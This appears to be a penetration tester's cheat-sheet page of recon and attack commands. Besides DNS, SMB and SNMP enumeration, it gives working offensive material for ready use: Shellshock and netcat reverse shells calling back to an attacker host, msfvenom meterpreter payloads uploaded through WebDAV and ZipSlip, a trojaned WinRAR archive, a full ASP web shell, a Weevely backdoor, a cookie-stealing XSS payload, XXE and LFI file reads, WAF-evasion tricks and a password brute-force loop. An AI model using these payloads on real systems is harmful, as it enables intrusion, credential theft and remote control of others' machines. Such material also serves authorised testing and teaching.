Miscellaneous Snippets

11 minute read

Collection of references, commands, scripts, and tool usage examples for various things.

References

ISO
OWASP cheatsheetseries
OWASP Top 10
PTES
SANS
NIST
COBIT
SABSA
TOGAF
ITIL


OSINT

awesome-osint
theharverster
Shodan
Google Hacking Database
Censys
spiderfoot
gitrob
maltego/casefile
recon-ng
discover.sh


General

Backup Files


bfac

bfac --url http://<rhost>/<target-file>

fuzzx

python fuzzx.py http://<rhost>/<target-file>


Crypto


CyberChef
dCode
esolangs
RsaCtfTool
DTFM decoder

Curl


curl -i <rhost>

curl <rhost>/robots.txt -s | html2text
curl <rhost>/README.md -s | html2text

curl <rhost> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
curl <rhost> -s -L | grep '<!--.*-->' | sed -e 's/^[[:space:]]*//'
curl <rhost> -s -L |sed -n '/<!--/,/-->/p'


DNS


dig axfr @<rhost> <domain>  
dig @<rhost> -x <rhost>

dig @<rhost> <domain> mx
dig @<rhost> <domain> ns

dig @<rhost> <domain> ALL
dig axfr <domain> @<rhost>
dig txt _dmarc.<domain>

host -l <domain> <rhost>

nslookup 
> set querytype=any
> <domain>

nslookup -type=txt <domain>

nmap --script dns-srv-enum --script-args dns-srv-enum.domain=<domain>

dnsenum <domain> 
dnsenum -p 5 -s 20 <domain> 
dnsenum -f subdomainslist.txt <domain>
dnsenum --enum <domain>

dnsrecon -d <domain> -t axfr 
dnsrecon -d <domain> -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml   // brute
dnsrecon -t std -d <domain>

dnstracer -r 3 -v example.com 

dmitry -wins output.txt <domain> 


Common Record Types


Record Description
A Host address
AAAA IPv6 host address
ALIAS Auto resolved alias
CNAME Canonical name for an alias
MX Mail eXchange
NS Name Server
PTR Pointer
SOA Start Of Authority
SRV location of service
TXT Descriptive text


DNSSEC Record Types


Record Description
DNSKEY DNSSEC public key
DS Delegation Signer
NSEC Next Secure
NSEC3 Next Secure v. 3
NSEC3PARAM NSEC3 Parameters
RRSIG RRset Signature


Less common Record Types


Record Description
AFSDB AFS Data Base location
ATMA Asynchronous Transfer Mode address
CAA Certification Authority Authorization
CERT Certificate / CRL
DHCID DHCP Information
DNAME Non-Terminal DNS Name Redirection
HINFO Host information
ISDN ISDN address
LOC Location information
MB, MG, MINFO, MR mailbox records
NAPTR Naming Authority Pointer
NSAP NSAP address
RP Responsible person
RT Route through
TLSA Transport Layer Security Authentication
X25 X.25 PSDN address

For a more detialed explaination of each type of record, shout out to dns-record-types by Simple DNS.


SubDomains


So many quality subdomain enumeration tools now amass
findomain
all.txt

wfuzz -w /root/SecLists/Discovery/DNS/subdomains-top1mil-5000.txt -u domain.htb -H "Host:FUZZ.domain.htb"   // HTB 


.DS_Store


ds_store_exp
ds_storescanner

python ds_store_exp.py http://<rhost>/.DS_Store


Emails


scrapemail

python scrapemail.py -url http://<rhost>/
python scrapemail.py -ulist <url-file>


Evil-WinRAR


Evil-WinRAR-Gen

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell.exe

touch winrar.txt
./evilWinRAR.py -e shell.exe -g winrar.txt


Finger


finger-user-enum.pl

finger <user>@<rhost>

./finger-user-enum.pl -U <username-list> -t <rhost>


Gobuster Wordlists


/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 
/root/SecLists/Discovery/Web-Content/common.txt 
/root/SecLists/Discovery/Web-Content/RobotsDisallowed-Top1000.txt
/root/SecLists/Discovery/Web-Content/CGIs.txt
/root/SecLists/Discovery/Web-Content/Logins.fuzz.txt
/root/SecLists/Discovery/Web-Content/raft*


HTTP Request Methods


Method Description
GET The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.
HEAD The HEAD method asks for a response identical to that of a GET request, but without the response body.
POST The POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server.
PUT The PUT method replaces all current representations of the target resource with the request payload.
DELETE The DELETE method deletes the specified resource.
CONNECT The CONNECT method establishes a tunnel to the server identified by the target resource.
OPTIONS The OPTIONS method is used to describe the communication options for the target resource.
TRACE The TRACE method performs a message loop-back test along the path to the target resource.
PATCH The PATCH method is used to apply partial modifications to a resource.


HTTPS / SSL


testssl.sh

nmap -sV -Pn -vv -p 443 --script=ssl-ccs-injection,ssl-cert-intaddr,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle,sslv2-drown,sslv2 <rhost>

sslyze --regular <rhost>

./testssl.sh <rhost>
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U <rhost>

python heartbleed.py <rhost>   


IIS Shortname


IIS_shortname_Scanner

python iis_shortname_Scan.py http://<rhost>/dir/


Java Deserialization


ysoserial

java -jar ysoserial.jar <payload> <command>


JSON Attacks


Attacking JSON Application - websecgeeks
JSON Deserialization Attacks
Munoz-Friday-The-13th-Json-Attacks
Munoz-Friday-The-13th-Json-Attacks 2


Json.Net Deserialization


ysoserial.net

ysoserial.exe -f <formatter> -g <gadget> -o <output> -c <command>
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "certutil.exe -urlcache..."

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c certutil.exe -urlcache...']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}


JSON Web Tokens


JWT.IO allows you to decode, verify and generate JWT.

JWT.io


LFI


sensitve-files

python lfigen.py /etc/passwd
import sys

f = sys.argv[1]

print "%s" % f 
print "..%s" % f
print "../..%s" % f
print "../../..%s" % f
print "../../../..%s" % f
print "../../../../..%s" % f
print "../../../../../..%s" % f
print "../../../../../../..%s" % f
print "../../../../../../../..%s" % f
print "../../../../../../../../..%s" % f
print "%s%%00" % f
print "..%s%%00" % f
print "../..%s%%00" % f
print "../../..%s%%00" % f
print "../../../..%s%%00" % f
print "../../../../..%s%%00" % f 
print "../../../../../..%s%%00" % f 
print "../../../../../../..%s%%00" % f 
print "../../../../../../../..%s%%00" % f 
print "../../../../../../../../..%s%%00" % f 
print "%s?" % f
print "..%s?" % f
print "../..%s?" % f
print "../../..%s?" % f
print "../../../..%s?" % f
print "../../../../..%s?" % f
print "../../../../../..%s?" % f
print "../../../../../../..%s?" % f
print "../../../../../../../..%s?" % f
print "../../../../../../../../..%s?" % f
print "..../%s" % f
print "....//..../%s" % f
print "....//....//..../%s" % f
print "....//....//....//..../%s" % f
print "....//....//....//....//..../%s" % f
print "....//....//....//....//....//..../%s" % f
print "....//....//....//....//....//....//..../%s" % f
print "....//....//....//....//....//....//....//..../%s" % f
print "....//....//....//....//....//....//....//....//..../%s" % f
print "....//....//....//....//....//....//....//....//....//..../%s" % f
print "/%%5C..%s" % f
print "/%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % 
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f


Magic Bytes


Magic Bytes - List of file signatures

Executable Binaries Mnemonic Signature
DOS Executable “MZ” 4D 5A
ELF Executable “.ELF” 7F 45 4C 46


Image File Formats Mnemonic Signature
PNG Image “.PNG….” 89 50 4E 47 0D 0A 1A 0A
GIF Image “GIF87a”
“GIF89a
47 49 46 38 37 61
47 49 46 38 39 61
JPEG Image “ÿØÿÛ”
“ÿØÿà..JFIF..”
“ÿØÿî”
“ÿØÿá..Exif..”
FF D8 FF DB
FF D8 FF E0 00 10 4A 46 49 46 00 01
FF D8 FF EE
FF D8 FF E1 ?? ?? 45 78 69 66 00 00


Mail


smtp-user-enum -M VRFY -U <userlist> -t <rhost>
smtp-user-enum -M EXPN -U <userlist> -t <rhost>
#!/usr/bin/python 
import socket 
import sys 

if len(sys.argv) != 2:         
    print "usage: vrfy.py <username>"         
    sys.exit(0)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
connect=s.connect(('<rhost>',25)) 
banner=s.recv(1024) print banner 
s.send('VRFY ' + sys.argv[1] + '\r\n') 
result=s.recv(1024) 
print result 
s.close() 


POP3

Command Comment
USER Your user name for this mail server
PASS Your password.
QUIT End your session.
STAT Number and total size of all messages
LIST Message# and size of message
RETR message# Retrieve selected message
DELE message# Delete selected message
NOOP No-op. Keeps you connection open.
RSET Reset the mailbox. Undelete deleted messages.


SMTP

Command Comment
HELO It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.
EHLO An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.
MAIL FROM With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.
RCPT TO It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.
SIZE This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.
DATA With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.
VRFY The server is asked to verify whether a particular email address or username actually exists.
TURN This command is used to invert roles between the client and the server, without the need to run a new connaction.
AUTH With the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.
RSET It communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT).
EXPN This SMTP command asks for a confirmation about the identification of a mailing list.
HELP It’s a client’s request for some information that can be useful for the a successful transfer of the email.
QUIT It terminates the SMTP conversation.
MAIL Defines source email address
BDAT Signifies that binary data will follow


Networking


Windows

1) Windows + R

2) ncpa.cpl    // run

3) Right click Ethernet -> Properties 

4) Select Internet Protocol Version 4 (TCP/IPv4) -> Properties 

5) Enter IP and DNS server:

	Use the following IP address: <...>


	Use the follwing DNS server addresses: <...>

Linux

ipcalc xx.xx.xx.xx

ifconfig <iface> xx.xx.xx.xx
ifconfig <iface> xx.xx.xx.xx/24   
ifconfig <iface> xx.xx.xx.xx netmask 255.xx.xx.xx 

echo nameserver xx.xx.xx.xx > /etc/resolv.conf


NFS


showmount -e <rhost>

mkdir /tmp/mnt
mount <rhost>:/<rdir> /tmp/mnt

mount -t nfs <rhost>:/<rdir> /tmp/mnt -nolock


Nmap


nmap -sT -p- --min-rate 5000 --max-retries 2 <rhost>
nmap -sC -sV -T4 <rhost>

ports=$(nmap -p- --min-rate=1000  -T4 <rhost> | grep ^[0-9] | cut -d '/'​ -f 1 | tr ​'\n'​ ​','​ | sed s/,$//) nmap -p​$ports​ -sC -sV <rhost> 


Oracle


odat.py

oscanner -s <rhost> -P <rport>

./odat.py sidguesser -s <rhost>

use auxiliary/admin/oracle/sid_brute  
use auxiliary/admin/oracle/sid_enum  

tnscmd10g version -h <rhost>


Padbusting


PadBuster

padbuster http://<rhost>/login.php <cookievalue> 8 --cookies <param>=<cookievalue> --encoding 0
padbuster http://<rhost>/login.php <cookievalue> 8 --cookies <param>=<cookievalue> --encoding 0 -plaintext  '<p>=<v>' 


RDP


pth-remote-desktop

apt-get update
apt-get install freerdp-x11

xfreerdp /u:<username> /pth:<hash> /v:<rhost>
xfreerdp -u <username> -p <password> <rhost>


reGeorg


reGeorg

1) Upload tunnel.(aspx|ashx|jsp|php) to a webserver 

2) Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py 

python reGeorgSocksProxy.py -p <port> -u http:/<rhost>/<uploaded-tunnel>
proxychains <command>


RPC


rpcclient <rhost> -U "" -N
rpcinfo -p <rhost>
rpcdump <rhost>  -v


Rsync


rsync-man-pages
pentesting-rsync

rsync --list-only -a rsync://<rhost>:<port> 
rsynx -avz rsync://<rhost>:<port>/etc /root/download/etc

/etc/rsync.conf 

for word in $(cat /root/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ); do sshpass -p $word rsync -6 -r rsync://<user>@<rhost>:<port>/module/ .; done 

rsync -av rsync://<user>@<rhost>/<module> <module> --port <port> –password-file=/root/rockyou.txt


Shellshock


shocker

python shocker.py -H <rhost> --command "/bin/cat /etc/passwd" -c /cgi-bin/shellshock.sh --verbose 
python shocker.py -H <rhost> --command "/bin/bash -i > /dev/tcp/<lhost>/<lport> 0<&1 2>&1" -c /cgi-bin/shellshock.sh 

User-Agent: () { :; }; bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
User-Agent: () { :; }; /usr/bin/nc <lhost> <lport> -e /bin/sh


SMB


Impacket
stealing hashes
capture ntlm hashes
smb-share-scf-file-attacks

enum4linux -a <rhost>

nbtscan <rhost>
nmblookup -A <rhost>
nbtstat -a <rhost>

samrdump.py <rhost>

smbmap -H <rhost> -u anonymous
nullinux -all <rhost>

smbclient //<rhost>/<share> -U " "%" "


auxiliary/admin/smb/samba_symlink_traversal
smb> symlink / rootfs
smb> cd rootfs
smb> symlink ../../../../../../../../../../foobar
smb> cd foobar  


responder -I <interface>

// save and upload as @hash.scf
[Shell]
Command=2
IconFile=\\<lhost>\share\hash.ico
[Taskbar]
Command=ToggleDesktop


SNMP


snmpenum.pl

nmap -sV -Pn -vv -p 161 --script=snmp-info,snmp-win32-users,snmp-processes,snmp-win32-services,snmp-win32-software,snmp-win32-shares <rhost> 

auxiliary/scanner/snmp/snmp_enumusers

snmpwalk -c <community> -v1 <rhost> 1
snmpcheck -t <rhost> -c <community>
snmpenum -t <rhost>
onesixtyone -c <community> -i <rhost>

./snmpenum.pl <rhost> public linux.txt
./snmpenum.pl <rhost> public windows.txt

Enumerate MIB:
****************************************
1.3.6.1.2.1.25.1.6.0    System Processes
1.3.6.1.2.1.25.4.2.1.2  Running Programs
1.3.6.1.2.1.25.4.2.1.4  Processes Path
1.3.6.1.2.1.25.2.3.1.4  Storage Units
1.3.6.1.2.1.25.6.3.1.2  Software Name
1.3.6.1.4.1.77.1.2.25   User Accounts
1.3.6.1.2.1.6.13.1.3    TCP Local Ports
****************************************

snmpwalk -c <community> -v1 <rhost> <MIB>


Stego


stego-toolkit
StegCracker

strings <file>

binwalk <file>
binwalk -e <file>

exiftool <file>
exiv2 <file>

foremost -i <file>

steghide info <file>
steghide extract -sf <file>

pngcheck <file>

zsteg -a <file>
zsteg -E <file>


WAF - Globbing


WAF evasion 1
WAF evasion 2
WAF evasion 3

Standard: 		/bin/nc myip 1337 
Evasion:			/???/n? 2130706433 1337 
Used chars: 		/ ? n [0-9]

Standard: 		/bin/cat /etc/passwd
Evasion: 			/???/??t /???/??ss??
Used chars: 		/ ? t s


Web Dav


davtest -url http://<rhost>/
davtest -url http://<rhost>/<dir>


1)
--------------------------------------------------------------------------------------------
msfvenom -p php/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f raw > shell.php

curl http://<rhost>/dav/ --upload-file /root/shell.php

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/shell.php


2)
--------------------------------------------------------------------------------------------
msfvenom -p php/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f raw > shell.php

cadaver http://<rhost>/dav 
dav:/>put shell.php
dav:/>exit

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/shell.php


3)
--------------------------------------------------------------------------------------------
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt

cadaver http://<rhost>/dav
dav:/>put /root/aspshell.txt
dav:/>copy aspshell.txt aspshellnew.asp;.txt
dav:/>exit

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/asphellnew.asp;.txt  


Webmin


ExploitDB-2017

perl webmin.pl <rhost> 10000 <target-file>
auxiliary/admin/webmin/file_disclosure

curl http://<rhost>:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 


Web Shells


WhiteWinterWolf
phpbash
p0wny-shell

root@kali:/usr/share/webshells# tree
.
├── asp
│   ├── cmd-asp-5.1.asp
│   └── cmdasp.asp
├── aspx
│   └── cmdasp.aspx
├── cfm
│   └── cfexec.cfm
├── jsp
│   ├── cmdjsp.jsp
│   └── jsp-reverse.jsp
├── perl
│   ├── perlcmd.cgi
│   └── perl-reverse-shell.pl
└── php
    ├── findsock.c
    ├── php-backdoor.php
    ├── php-findsock-shell.php
    ├── php-reverse-shell.php
    ├── qsd-php-backdoor.php
    └── simple-backdoor.php

ASPX

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

Weevely

weevely generate Sh3ll            // generate password 'Sh3ll' protected PHP backdoor
weevely http://<rhost>/path/to/upload/shell.php Sh3ll  // trigger shell
...
weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Wordlists / Creation


SecLists
Leaked-Databases
rockyou.txt

cewl <url> -w outfilewordlist.txt
cewl <url> -m 6 -w outfileworlist.txt

python cupp.py -pw profiler   

twofi -m 6 -u @target > wordlist_target.txt  

Wordhound 
Brutescrape  
crunch


XXE


XXE Injection

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <Content>    
	<Author>&xxe;</Author>
	<Subject>exploit</Subject>
     </Content>
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE hack [<!ENTITY xxe SYSTEM "http://<lhost>/shell.php" >]>
<foo>&xxe;</foo>


XXS


Advanced XXS

<script>alert("XSS")</script>

<iframe SRC="http://<lhost>/report" height = "0" width ="0"></iframe>

<script> new Image().src="http://<lhost>/bogus.php?output="+document.cookie; </script>


ZipSlip


ZipSlip
evilarc

msfvenom -p php/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> > shell.php

python evilarc.py -f shell.zip -o unix -p "../../../../../../var/www/html" shell.php

./handler.sh php/meterpreter/reverse_tcp <lhost> <lport>

→ Upload shell.zip
→ Trigger meterpreter shell by browsing to it